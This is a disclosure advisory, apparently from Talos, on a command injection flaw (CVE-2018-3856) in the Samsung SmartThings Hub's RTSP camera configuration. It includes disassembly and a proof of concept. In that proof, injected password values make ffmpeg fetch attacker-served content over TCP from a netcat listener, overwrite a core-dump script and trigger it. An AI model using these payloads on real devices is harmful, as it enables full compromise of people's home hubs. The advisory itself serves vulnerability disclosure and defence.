My SeebugSSV:97440Samsung SmartThings Hub video-core RTSP Configuration Command Injection Vulnerability(CVE-2018-3856)
0.002 Low
EPSS
Percentile
56.2%
Summary
An exploitable vulnerability exists in the smart cameras RTSP
configuration of the Samsung SmartThings Hub. The device incorrectly
handles spaces in the URL field, leading to an arbitrary operating
system command injection. An attacker can send a series of HTTP requests
to trigger this vulnerability.
Tested Versions
Samsung SmartThings Hub STH-ETH-250 - Firmware version 0.20.17
Product URLs
https://www.smartthings.com/products/smartthings-hub
CVSSv3 Score
9.9 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
CWE
CWE-88: Argument Injection or Modification
Details
Samsung produces a series of devices aimed at controlling and monitoring
a home such as wall switches, LED bulbs, thermostats and cameras. One of
those is the Samsung SmartThings Hub, a central controller which allows
an end user to use his or her smartphone to connect to his or her own
house remotely and manage any other device through it. The hub board
utilizes several systems on chips. The firmware in question is executed
by an i.MX 6 SoloLite processor (Cortex-A9), which has an ARMv7-A
architecture.
The firmware is Linux-based, and runs a series of daemons that interface
with devices nearby via ethernet, ZigBee, Z-Wave and Bluetooth
protocols. Additionally, the hubCore process is responsible for
communicating with the remote SmartThings servers via a persistent TLS
connection. These servers act as a bridge that allow for a secure
communication between the smartphone application and the hub. End users
can simply install the SmartThings mobile application on their
smartphone to control the hub remotely.
One of the features of the hub is that it connects to smart cameras,
configures them and looks at their livestreams. For testing, we set up
the Samsung SmartCam SNH-V6414BN on the hub. Once done, the livestream
can be displayed by the smartphone application by connecting either to
the remote SmartThings servers, or directly to the camera, if they’re
both in the same subnetwork.
Inside the hub, the livestream is handled by the video-core process,
which uses ffmpeg to connect via RTSP to the smart camera in its same
local network, and at the same time, provides a streamable link for the
smartphone application.
The livestream configuration can be changed from the smartphone
application. When a user changes the smart camera’s password, the
following request is sent to api.smartthings.com via HTTPS:
PUT /elder/<location-id>/api/devices/<device-id>/pages/preferences HTTP/1.1
X-ST-Api-Version: 3.2
X-ST-Client-AppVersion: 2.14.0
Authorization: Bearer <auth-token>
Accept: application/json
Content-Type: application/json; charset=UTF-8
Host: api.smartthings.com
User-Agent: okhttp/3.6.0
...
{"completedSetup":true,"label":"SNH-V6414BN","preferences":[{"name":"wlanMode","value":"PSK"},{"name":"cameraBrightness","value":"Med"},{"name":"wlanPassword","value":""},{"name":"cameraTimeZone","value":"4"},{"name":"cameraPassword","value":"<camera-password>"},{"name":"cameraOverlay","value":"Off"},{"name":"cameraDayNightMode","value":"Auto"},{"name":"cameraImage","value":"No Flip - No Mirror"},{"name":"wlanSite","value":""},{"name":"cameraWDR","value":"WDR"},{"name":"cameraAudio","value":"Low/Med"}]}
Note that the request above actually sets all the smart camera’s
preferences in one shot. Notable parameters are:
location-id: canonical UUID which identifies a hub in a specific location
device-id: canonical UUID of a device (e.g. smart camera UUID)
auth-token: OAuth 2.0 Bearer Token (canonical UUID), provided by auth-global.api.smartthings.com
camera-password: the new password for connecting to the camera via RTSP
In order to apply the new configuration to the hub, SmartThings servers
send a series of messages to the device, which are received by the
hubCore process. Specifically, when the cameraPassword value is
changed, hubCore will receive the following message:
PATCH /cameras/<device-id> HTTP/1.1
Accept: */*
User-Agent: Linux UPnP/1.0 SmartThings
Content-Type: application/json
Connection: Close
Host: 127.0.0.1:3000
Content-Length: 83
{"url":"rtsp://admin:<camera-password>@<camera-ip>:554/profile4/media.smp","state":"on"}
Note that the new parameter camera-ip was previously set on the
initial camera setup phase.
This message will be relayed without any modification to the HTTP server
running inside the video-core process. The message notifies the
video-core process for updating the URL needed to establish the RTSP
connection. The HTTP server listens on port 3000, bound to the localhost
address, so a local connection is needed to perform this request.
Upon receiving the request above, video-core will save the new camera
URL in its internal database. Shortly after, the thread vidWatcher of
the video-core process will re-execute the ffmpeg command using the
new URL. ffmpeg options are collected by function sub_1D240:
.text:0001D240 sub_1D240
...
.text:0001D3B0 898 MOV R1, R0
.text:0001D3B4 898 MOV R0, R7 ; [1]
.text:0001D3B8 898 BL sub_395DC ; [2] add -stimeout
.text:0001D3BC 898 CMP R0, #0
.text:0001D3C0 898 BLT loc_1D7A8
.text:0001D3C4 898 MOV R0, R7
.text:0001D3C8 898 LDR R1, [SP,#0x898+var_430]
.text:0001D3CC 898 BL sub_39674 ; [3] add -t
.text:0001D3D0 898 CMP R0, #0
.text:0001D3D4 898 BLT loc_1D81C
.text:0001D3D8 898 MOV R1, #0x8368
.text:0001D3DC 898 MOV R0, R7
.text:0001D3E0 898 MOVT R1, #0xB
.text:0001D3E4 898 BL sub_39520 ; [4] add -rtsp_transport
.text:0001D3E8 898 CMP R0, #0
.text:0001D3EC 898 BLT loc_1D8A4
.text:0001D3F0 898 MOV R1, R8 ; camera url
.text:0001D3F4 898 MOV R0, R7
.text:0001D3F8 898 BL sub_39818 ; [5] add -i (camera url)
...
.text:0001D4F8 898 MOV R1, R7 ; [7]
.text:0001D4FC 898 BL sub_1B9E8 ; [6]
The function reads a series of parameters from the internal database,
and builds a string (pointed by r7 [1]) by appending each parameter at
the end ([2], [3], [4], [5]). Note that the actual URL value is added at
[5]. The resulting string is simply a series of arguments for ffmpeg.
This is an example of such a string:
" -stimeout 2000000 -t 12:00:00 -rtsp_transport tcp -i rtsp://admin:<camera-password>@<camera-ip>:554/profile4/media.sme -strict experimental -flags +global_header -vcodec copy -acodec aac -profile:a aac_low -cutoff 3400 -ar:a 8000 -b:a 32k -hls_wrap 10 -hls_list_size 3 -hls_allow_cache 1 -hls_time 2 /var/volatile/videocore/ringbuffer/<device-id>/live.m3u8"
Finally, function sub_1B9E8 is called [6], passing the reference to
the arguments string as second parameter [7]:
.text:0001B9E8 sub_1B9E8
.text:0001B9E8
.text:0001B9E8 000 CMP R2, #0
.text:0001B9EC 000 CMPNE R1, #0 ; [8] ptr to ffmpeg args string
.text:0001B9F0 000 STMFD SP!, {R4-R9,LR}
.text:0001B9F4 01C SUB SP, SP, #0x480
.text:0001B9F8 49C SUB SP, SP, #0xC
.text:0001B9FC 4A8 BNE loc_1BA24
...
.text:0001BA24 loc_1BA24
.text:0001BA24 4A8 MOV R8, R0
.text:0001BA28 4A8 LDR R0, [R1]
.text:0001BA2C 4A8 CMP R0, #0
.text:0001BA30 4A8 BEQ loc_1BC00
.text:0001BA34 4A8 MOV R6, R3
.text:0001BA38 4A8 MOV R1, #0xB3C8
.text:0001BA3C 4A8 MOV R3, #0x7D4C
.text:0001BA40 4A8 MOVT R1, #0xB ; [9] " " (space)
.text:0001BA44 4A8 MOVT R3, #0xB ; [10] "ffmpeg"
.text:0001BA48 4A8 MOV R7, R2
.text:0001BA4C 4A8 STR R3, [SP,#0x4A8+argv] ; [11]
.text:0001BA50 4A8 BL strtok ; [12]
.text:0001BA54 4A8 SUBS R12, R0, #0
.text:0001BA58 4A8 BEQ loc_1BBF8
.text:0001BA5C 4A8 ADD R5, SP, #0x4A8+argv
.text:0001BA60 4A8 MOV R4, #1
.text:0001BA64 4A8 B loc_1BA70
.text:0001BA68
.text:0001BA68 loc_1BA68 ; [13] tokenization loop
.text:0001BA68 4A8 CMP R4, #0x64
.text:0001BA6C 4A8 BEQ loc_1BBF0
.text:0001BA70
.text:0001BA70 loc_1BA70
.text:0001BA70 4A8 MOV R1, #0xB3C8
.text:0001BA74 4A8 STR R12, [R5,#4]!
.text:0001BA78 4A8 MOV R0, #0
.text:0001BA7C 4A8 MOVT R1, #0xB
.text:0001BA80 4A8 BL strtok ; [12]
.text:0001BA84 4A8 SUBS R12, R0, #0
.text:0001BA88 4A8 ADD R4, R4, #1
.text:0001BA8C 4A8 BNE loc_1BA68 ; [13] tokenization loop
.text:0001BA90 4A8 MOV R4, R4,LSL#2
.text:0001BA94
.text:0001BA94 loc_1BA94
.text:0001BA94 4A8 ADD R3, SP, #0x4A8+var_28
.text:0001BA98 4A8 ADD R0, SP, #0x4A8+pipedes
.text:0001BA9C 4A8 ADD R3, R3, #8
.text:0001BAA0 4A8 ADD R4, R3, R4
.text:0001BAA4 4A8 MOV R3, #0
.text:0001BAA8 4A8 STR R3, [R4,#-0x370]
.text:0001BAAC 4A8 BL pipe
.text:0001BAB0 4A8 CMP R0, #0
.text:0001BAB4 4A8 BEQ loc_1BB78
...
.text:0001BB78 loc_1BB78
.text:0001BB78 4A8 ADD R0, SP, #0x4A8+var_498
.text:0001BB7C 4A8 BL pipe
.text:0001BB80 4A8 SUBS R4, R0, #0
.text:0001BB84 4A8 BEQ loc_1BC5C
...
.text:0001BBF0 loc_1BBF0
.text:0001BBF0 4A8 MOV R4, #0x190
.text:0001BBF4 4A8 B loc_1BA94
...
.text:0001BC5C loc_1BC5C
...
.text:0001BCA0 4A8 BL fork
.text:0001BCA4 4A8 SUBS R5, R0, #0
.text:0001BCA8 4A8 BEQ loc_1BE2C
...
.text:0001BE2C loc_1BE2C
...
.text:0001BEA8 4A8 MOV R1, #0x7E4C
.text:0001BEAC 4A8 LDR R0, [R8,#4]
.text:0001BEB0 4A8 MOVT R1, #0xB
.text:0001BEB4 4A8 BL sub_281B0
.text:0001BEB8 4A8 MOV R3, #0x7D4C
.text:0001BEBC 4A8 CMP R0, #0
.text:0001BEC0 4A8 MOVT R3, #0xB ; "ffmpeg"
.text:0001BEC4 4A8 ADD R1, SP, #0x4A8+argv
.text:0001BEC8 4A8 MOVEQ R0, R3
.text:0001BECC 4A8 BL execvp ; [14]
We can see that the arguments, passed as second parameter [8], are split
on every space character [9] using the strtok function [12] in a loop
[13]. Every token is saved into the argv array [11], whose first
element was set to ffmpeg [10]. The resulting array is then passed as
the argv parameter of the execvp call [14].
Since the space character inside the camera-password is never modified
throughout the whole processing, and the arguments splitting is
performed by simply looking for space characters, an attacker that
controls the camera-password can add new options to the invocation of
the ffmpeg binary.
This can be exploited to execute arbitrary shell commands, resulting in
a complete compromise of the device. We identified three different
vectors that allow for exploiting this vulnerability:
- As it was shown above, anyone owning a valid OAuth bearer token, or
the relative username and password pair to obtain it, can modify the
configuration of a camera by sending a request to
api.smartthings.com. The request can contain an arbitrary password
that would be relayed to the vulnerablevideo-coreprocess. - Anyone able to impersonate the remote SmartThings servers can send
arbitrary HTTP requests tohubCore, that would be relayed without
modification to the vulnerablevideo-coreprocess. - SmartThings SmartApps allow for creating custom applications that
can be either published directly into the device itself or on the
public Marketplace. A SmartApp is executed inside thehubCore
process and is allowed to make any localhost connection. It is thus
possible for a SmartApp to send arbitrary HTTP requests directly to
the vulnerablevideo-coreprocess.
Exploit Proof of Concept
The following proof of concept shows how to execute an arbitrary command
inside the device, by using the api.smartthings.com vector.
It’s assumed that an attacker already owns a valid OAuth bearer token. A
camera also needs to be set up on the hub. A fake camera could be added
by an attacker, but for simplicity, we assume that we already have a
configured camera available.
Exploitation relies on the ability of ffmpeg to pipe any raw data from
a plain TCP connection into a file. This is possible thanks to the
data file format and the copy codec, since when used together, they
omit any encoding or decoding of the raw stream. For example, to write
the string talos into /tmp/test in machineB, one could execute:
machineA -- $ echo talos | nc -l -p 3333
machineB -- $ ffmpeg -f data -i tcp://@<machineA>:3333 -map 0 -codec copy -y -f data /tmp/test
Moreover, ffmpeg supports multiple inputs and outputs on a unique
invocation, which allows for injecting this kind of command anywhere in
the arguments list.
However, since the majority of the system partitions are mounted
read-only, executing arbitrary commands becomes slightly more tricky,
and we show how it can be done by overwriting two files:
# cat /proc/sys/kernel/core_pattern
|/tmp/compressdump.sh /hub/data/coredump/%e.core.gz .*
# realpath /tmp
/var/volatile/tmp
# mount | grep /var/volatile
tmpfs on /var/volatile type tmpfs (rw,relatime,size=102400k)
We can see that the /tmp directory can be written to, and it also
contains the script /tmp/compressdump.sh, which is called when a core
dump is generated. To generate a core dump, it’s enough to write any
invalid string in /tmp/ledstate. This is a pipe read by the ledd
process, which crashes as soon as an unexpected string is found in the
pipe.
So to execute an arbitrary command, it’s enough to:
1. Overwrite `/tmp/compressdump.sh`
-- attacker machine -> api.smartthings.com
PUT /elder/<location-id>/api/devices/<device-id>/pages/preferences HTTP/1.1
...
{ ...
{"name":"cameraPassword","value":"admin@<camera-ip>:554/profile4/media.smp -timeout 1 -f data -i tcp://@<attacker-ip>:<attacker-port> -map 1 -codec copy -y -f data /tmp/compressdump.sh -metadata title=\""},
...
}
-- attacker sends the contents that will overwrite compressdump.sh
echo 'ping -c1 <attacker-ip>' | nc -l -p <attacker-port>
2. Trigger a core dump, so that `/tmp/compressdump.sh` is called:
-- attacker machine -> api.smartthings.com
PUT /elder/<location-id>/api/devices/<device-id>/pages/preferences HTTP/1.1
...
{ ...
{"name":"cameraPassword","value":"admin@<camera-ip>:554/profile4/media.smp -timeout 1 -f data -i tcp://@<attacker-ip>:<attacker-port> -map 1 -codec copy -y -f data /tmp/ledstate -metadata title=\""},
...
}
-- attacker sends the string "talos" that will crash the "ledd" process
echo talos | nc -l -p <attacker-port>
Note that the metadata parameter is used to discard the rest of the
URL where the password was injected. Otherwise, ffmpeg would fail
because an unknown option would be specified.
Timeline
- 2018-03-23 - Vendor Disclosure
- 2018-05-23 - Discussion with vendor/review of timeline for disclosure
- 2018-07-17 - Vendor patched
- 2018-07-26 - Public Release
Related
